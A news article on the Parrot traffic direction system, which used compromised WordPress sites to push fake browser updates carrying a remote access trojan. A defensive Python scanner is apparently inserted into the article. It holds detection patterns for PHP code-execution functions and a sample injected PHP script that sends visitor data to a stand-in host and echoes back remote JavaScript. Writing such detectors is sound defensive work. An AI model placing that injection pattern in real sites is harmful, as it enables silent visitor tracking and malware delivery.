Over 16,500 Sites Hacked To Distribute Malware Through Web Redirection Service

A new traffic directing system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch new malicious campaigns.

“TDS infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites and local government sites,” Avast researchers Pavel Novák and Jan Rubin said in a report released last week.

Traffic direction systems are used by threat actors to decide whether a visitor is a target of interest and, if so, to redirect them to a malicious domain under the actors' control; in effect the TDS acts as a gateway for compromising the visitor's system with malware.


Earlier in January, BlackBerry’s Research and Intelligence team detailed another TDS called Prometheus, which was used in different campaigns mounted by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader and SocGholish malware.

What sets Parrot TDS apart is its enormous reach, with increased activity seen in February and March 2022, as its operators primarily targeted servers hosting poorly secured WordPress sites to gain admin access.

Most of the users targeted by these malicious redirects are located in Brazil, India, USA, Singapore, Indonesia, Argentina, France, Mexico, Pakistan and Russia.

“The appearances of infected sites are changed by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notifications allowing users to update their browsers, offering an update file for download,” said the researchers. “The observed file given to the victims is a remote access tool.”


Parrot TDS, via an injected PHP script hosted on the compromised server, is designed to extract client information and forward the request to the command and control (C2) server whenever a visitor lands on one of the infected sites, in addition to allowing the attacker to execute arbitrary code on the server.

The response from the C2 server takes the form of JavaScript code executed on the client machine, exposing victims to new potential threats. Apart from the malicious backdoor PHP script, a web shell is also observed that grants the adversary persistent remote access to the web server.
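The three-stage flow described above (fingerprint the visitor, forward it to a remote host, echo the returned JavaScript into the page) lends itself to a simple heuristic for hunting injected PHP on a WordPress install. The scanner below is an added example, not Avast's or the article's code; the regexes, the "all three stages present" rule and the constructed fixtures are assumptions, not indicators from the report.

```python
"""Heuristic scanner for PHP files showing the TDS pattern described in the
article: client fingerprinting + outbound request to a remote host + echoing
the reply into the page. Added example; fixtures are constructed and the
heuristics are an assumption, not published Parrot TDS indicators."""
import re
from pathlib import Path

# One pattern per stage of the described flow, plus the web-shell style
# code-execution functions that the backdoor variant would need.
FINGERPRINT = re.compile(r"\$_SERVER\s*\[\s*['\"](HTTP_USER_AGENT|REMOTE_ADDR|HTTP_REFERER|REQUEST_URI)['\"]\s*\]")
REMOTE_FETCH = re.compile(r"\b(curl_exec|curl_init|file_get_contents|fsockopen|stream_context_create)\s*\(")
EMITS_RESPONSE = re.compile(r"\b(echo|print|die|exit)\b[^;]{0,80}\$\w+\s*;")
CODE_EXEC = re.compile(r"\b(eval|assert|create_function|system|shell_exec|passthru)\s*\(")

def score_php(source: str) -> dict:
    """Return which stages a PHP source matches and an overall verdict."""
    hits = {
        "fingerprint": bool(FINGERPRINT.search(source)),
        "remote_fetch": bool(REMOTE_FETCH.search(source)),
        "emits_response": bool(EMITS_RESPONSE.search(source)),
        "code_exec": bool(CODE_EXEC.search(source)),
    }
    # Only the full fingerprint -> fetch -> emit chain is flagged; any one
    # stage alone is common in legitimate plugin code.
    hits["suspicious"] = hits["fingerprint"] and hits["remote_fetch"] and hits["emits_response"]
    return hits

def scan_tree(root: Path) -> list:
    """Walk a directory (e.g. a WordPress docroot) and list flagged PHP files."""
    flagged = []
    for path in root.rglob("*.php"):
        try:
            src = path.read_text(errors="ignore")
        except OSError:
            continue
        if score_php(src)["suspicious"]:
            flagged.append(str(path))
    return flagged

# Constructed fixture mirroring the described flow (non-functional host).
SAMPLE_INJECTED = """<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
$ctx = stream_context_create(['http' => ['method' => 'POST', 'content' => $ua]]);
$js = file_get_contents('http://tds.example.invalid/gate', false, $ctx);
echo $js;
"""
# Constructed benign theme snippet: emits output but never fetches remotely.
SAMPLE_BENIGN = "<?php\n$title = get_the_title();\necho esc_html($title);\n"

if __name__ == "__main__":
    print(score_php(SAMPLE_INJECTED))
```

Run `scan_tree(Path("/var/www/html"))` against a site and review every flagged file by hand; the heuristic is a triage aid, not a verdict.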

Calling the criminal actors behind the FakeUpdate campaign a prominent Parrot TDS client, Avast said the attacks involved tricking users into downloading malware under the guise of fake browser updates: a remote access trojan named “ctfmon.exe” which gives the attacker full access to the host.
